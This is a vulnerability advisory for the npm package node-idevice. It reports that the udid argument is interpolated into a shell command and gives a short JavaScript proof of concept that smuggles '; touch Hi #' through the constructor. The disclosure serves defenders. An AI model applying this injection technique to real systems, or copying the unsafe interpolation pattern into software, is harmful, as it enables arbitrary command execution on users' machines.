vulnerability command injection
severity 3.8
language javascript
registry npm


node-idevice is a package to install apps to iOS devices via node.

Affected versions of this package are vulnerable to Command Injection. The udid string passed to the IDevice constructor is interpolated into a shell command, so a value containing a semicolon can inject arbitrary commands (see PoC). The injected command is then executed by any function that calls IDevice.prototype.list.

Proof of Concept

var idevice = require('node-idevice');
// The udid is spliced into a shell command string; the semicolon terminates
// the intended command and "#" comments out the rest of the line.
var device = new idevice("; touch Hi #//");

// isInstalled calls IDevice.prototype.list, which runs the injected command.
device.isInstalled("hacked", function (err, installed) {
  // the injected "touch Hi" has already run by the time this callback fires
});